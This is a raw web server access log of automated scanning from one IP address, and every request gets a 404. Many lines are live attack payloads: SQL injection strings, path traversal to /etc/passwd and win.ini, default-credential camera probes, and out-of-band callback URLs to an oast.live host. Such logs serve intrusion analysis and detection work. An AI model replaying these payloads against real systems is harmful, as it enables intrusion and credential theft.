137.220.197.141 - - [21/Jan/2024:03:35:19 +0100] "GET /plus/recommend.php?action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:35:56 +0100] "GET /CMSInstall/install.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:35:59 +0100] "GET /composer/send_email?to=HuRv@hzNn&url=http://cmm00rc3m87t5g88qsoga7duqeqcbcphm.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:36:14 +0100] "GET /plus/recommend.php?action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:36:39 +0100] "GET /plus/recommend.php?action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:36:44 +0100] "GET /CMSInstall/install.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:36:46 +0100] "GET /composer/send_email?to=AMIF@vAFI&url=http://cmm00rc3m87t5g88qsogqyuurshuu6xb3.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:37:06 +0100] "GET /CMSInstall/install.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:37:09 +0100] "GET /composer/send_email?to=SBCF@Cwkh&url=http://cmm00rc3m87t5g88qsogab6571zrwd8c5.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:38:45 +0100] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:39:13 +0100] "GET /passwordrecovered.cgi?id=GCDmq HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:39:56 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:40:22 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:40:23 +0100] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:40:23 +0100] "GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:40:35 +0100] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:40:40 +0100] "GET /CMSInstall/install.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:40:44 +0100] "GET /composer/send_email?to=EaqK@HTqG&url=http://cmm00rc3m87t5g88qsog6kocxddy6frg9.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:40:48 +0100] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:40:50 +0100] "GET /passwordrecovered.cgi?id=AKBvh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:40:59 +0100] "GET /plus/recommend.php?action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:41:02 +0100] "GET /passwordrecovered.cgi?id=pznwG HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:41:14 +0100] "GET /passwordrecovered.cgi?id=iGMdI HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:41:44 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:41:55 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:42:09 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:42:35 +0100] "GET /CMSInstall/install.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:42:38 +0100] "GET /composer/send_email?to=ThkE@RZkU&url=http://cmm00rc3m87t5g88qsogmig958hdj3tc4.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:42:47 +0100] "GET /CMSInstall/install.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:42:50 +0100] "GET /composer/send_email?to=WpLR@WaYW&url=http://cmm00rc3m87t5g88qsogckrdoj58tnrds.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:43:09 +0100] "GET /plus/recommend.php?action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:43:23 +0100] "GET /plus/recommend.php?action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:43:47 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:43:49 +0100] "GET /hw-sys.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:44:25 +0100] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:44:37 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:44:39 +0100] "GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:44:45 +0100] "GET /passwordrecovered.cgi?id=YpEqT HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:45:04 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:45:06 +0100] "GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:45:19 +0100] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:45:38 +0100] "GET /passwordrecovered.cgi?id=TTNai HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:45:44 +0100] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:45:57 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:46:02 +0100] "GET /passwordrecovered.cgi?id=bu4Qn HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:46:55 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:47:09 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:47:11 +0100] "GET /hw-sys.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:47:21 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:47:35 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:47:37 +0100] "GET /hw-sys.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:48:03 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:48:05 +0100] "GET /hw-sys.htm HTTP/1.1" 404 952
146.19.24.23 - - [21/Jan/2024:03:49:14 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:50:08 +0100] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:50:17 +0100] "GET /passwordrecovered.cgi?id=9u0S8 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:52:02 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:52:20 +0100] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:52:26 +0100] "GET /passwordrecovered.cgi?id=gdrqo HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:52:34 +0100] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:52:40 +0100] "GET /passwordrecovered.cgi?id=Leevu HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:54:22 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:54:36 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:55:12 +0100] "POST /clients/editclient.php?id=2bECypVlpHARcDACFy7i3Wakjid&action=update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:55:14 +0100] "GET /logos_clients/2bECypVlpHARcDACFy7i3Wakjid.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:55:53 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:55:55 +0100] "GET /hw-sys.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:57:41 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:57:43 +0100] "GET /hw-sys.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:58:05 +0100] "OPTIONS / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:58:11 +0100] "POST /clients/editclient.php?id=2bECypVlpHARcDACFy7i3Wakjid&action=update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:58:13 +0100] "GET /logos_clients/2bECypVlpHARcDACFy7i3Wakjid.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:58:32 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:58:32 +0100] "POST /clients/editclient.php?id=2bECypVlpHARcDACFy7i3Wakjid&action=update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:58:34 +0100] "GET /hw-sys.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:58:34 +0100] "GET /logos_clients/2bECypVlpHARcDACFy7i3Wakjid.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:58:58 +0100] "POST /clients/editclient.php?id=2bECypVlpHARcDACFy7i3Wakjid&action=update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:59:00 +0100] "GET /logos_clients/2bECypVlpHARcDACFy7i3Wakjid.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:59:30 +0100] "OPTIONS / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:59:40 +0100] "OPTIONS / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:59:52 +0100] "OPTIONS / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:02:56 +0100] "OPTIONS / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:03:43 +0100] "OPTIONS / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:03:58 +0100] "GET /verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:04:00 +0100] "GET /mantis/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:04:02 +0100] "GET /mantisBT/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:04:04 +0100] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:04:05 +0100] "OPTIONS / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:04:06 +0100] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:05:41 +0100] "POST /clients/editclient.php?id=2bECypVlpHARcDACFy7i3Wakjid&action=update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:05:43 +0100] "GET /logos_clients/2bECypVlpHARcDACFy7i3Wakjid.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:05:50 +0100] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:07:04 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:07:06 +0100] "GET /hw-sys.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:07:12 +0100] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:07:20 +0100] "POST /clients/editclient.php?id=2bECypVlpHARcDACFy7i3Wakjid&action=update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:07:22 +0100] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:07:22 +0100] "GET /logos_clients/2bECypVlpHARcDACFy7i3Wakjid.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:07:33 +0100] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:07:40 +0100] "OPTIONS / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:08:06 +0100] "POST /clients/editclient.php?id=2bECypVlpHARcDACFy7i3Wakjid&action=update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:08:08 +0100] "GET /logos_clients/2bECypVlpHARcDACFy7i3Wakjid.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:09:36 +0100] "OPTIONS / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:09:49 +0100] "OPTIONS / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:10:35 +0100] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:10:40 +0100] "GET /verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:10:42 +0100] "GET /mantis/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:10:44 +0100] "GET /mantisBT/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:10:46 +0100] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:10:48 +0100] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:11:23 +0100] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:11:31 +0100] "GET /verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:11:33 +0100] "GET /mantis/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:11:35 +0100] "GET /mantisBT/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:11:37 +0100] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:11:37 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:11:39 +0100] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:11:40 +0100] "GET /hw-sys.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:11:45 +0100] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:12:08 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:12:10 +0100] "GET /hw-sys.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:12:31 +0100] "GET /verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:12:33 +0100] "GET /mantis/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:12:35 +0100] "GET /mantisBT/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:12:37 +0100] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:12:39 +0100] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:15:18 +0100] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:15:30 +0100] "GET /current_config/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:15:54 +0100] "POST /clients/editclient.php?id=2bECypVlpHARcDACFy7i3Wakjid&action=update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:15:56 +0100] "GET /logos_clients/2bECypVlpHARcDACFy7i3Wakjid.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:17:04 +0100] "GET /current_config/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:17:10 +0100] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:17:14 +0100] "GET /current_config/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:17:22 +0100] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:17:27 +0100] "GET /current_config/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:18:05 +0100] "GET /current_config/Sha1Account1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:19:26 +0100] "GET /current_config/Sha1Account1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:19:35 +0100] "GET /current_config/Sha1Account1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:19:47 +0100] "GET /current_config/Sha1Account1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:19:56 +0100] "POST /clients/editclient.php?id=2bECypVlpHARcDACFy7i3Wakjid&action=update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:19:58 +0100] "GET /logos_clients/2bECypVlpHARcDACFy7i3Wakjid.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:20:20 +0100] "POST /clients/editclient.php?id=2bECypVlpHARcDACFy7i3Wakjid&action=update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:20:22 +0100] "GET /logos_clients/2bECypVlpHARcDACFy7i3Wakjid.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:21:01 +0100] "GET /current_config/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:21:12 +0100] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:21:24 +0100] "POST /integration/saveGangster.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:21:55 +0100] "GET /current_config/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:22:20 +0100] "GET /current_config/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:22:39 +0100] "GET /current_config/Sha1Account1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:22:51 +0100] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:23:00 +0100] "POST /integration/saveGangster.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:23:01 +0100] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:23:11 +0100] "POST /integration/saveGangster.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:23:14 +0100] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:23:24 +0100] "POST /integration/saveGangster.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:23:24 +0100] "GET /current_config/Sha1Account1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:23:46 +0100] "GET /current_config/Sha1Account1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:26:26 +0100] "GET /current_config/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:26:46 +0100] "GET /verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:26:48 +0100] "GET /mantis/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:26:50 +0100] "GET /mantisBT/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:26:52 +0100] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:26:53 +0100] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:26:53 +0100] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:26:59 +0100] "POST /integration/saveGangster.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:27:13 +0100] "GET /current_config/Sha1Account1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:27:48 +0100] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:27:54 +0100] "POST /integration/saveGangster.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:28:12 +0100] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:28:17 +0100] "POST /integration/saveGangster.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:28:37 +0100] "GET /current_config/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:28:41 +0100] "GET /__ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:28:43 +0100] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:28:49 +0100] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:28:51 +0100] "POST /orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:28:51 +0100] "GET /current_config/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:29:08 +0100] "GET /current_config/Sha1Account1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:29:21 +0100] "GET /current_config/Sha1Account1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:30:07 +0100] "GET /dumpmdm.cmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:30:16 +0100] "GET /__ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:30:20 +0100] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:30:27 +0100] "GET /__ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:30:30 +0100] "GET /verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:30:30 +0100] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:30:32 +0100] "GET /mantis/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:30:34 +0100] "GET /mantisBT/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:30:36 +0100] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:30:38 +0100] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:30:40 +0100] "GET /__ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:30:44 +0100] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:31:28 +0100] "GET /dumpmdm.cmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:31:34 +0100] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:31:38 +0100] "GET /dumpmdm.cmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:31:49 +0100] "GET /dumpmdm.cmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:32:05 +0100] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:32:07 +0100] "POST /orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:32:16 +0100] "GET /verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:32:18 +0100] "GET /mantis/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:32:20 +0100] "GET /mantisBT/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:32:22 +0100] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:32:24 +0100] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:32:28 +0100] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:32:30 +0100] "POST /orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:32:36 +0100] "POST /integration/saveGangster.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:32:36 +0100] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:32:54 +0100] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:32:56 +0100] "POST /orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:33:10 +0100] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 404 952
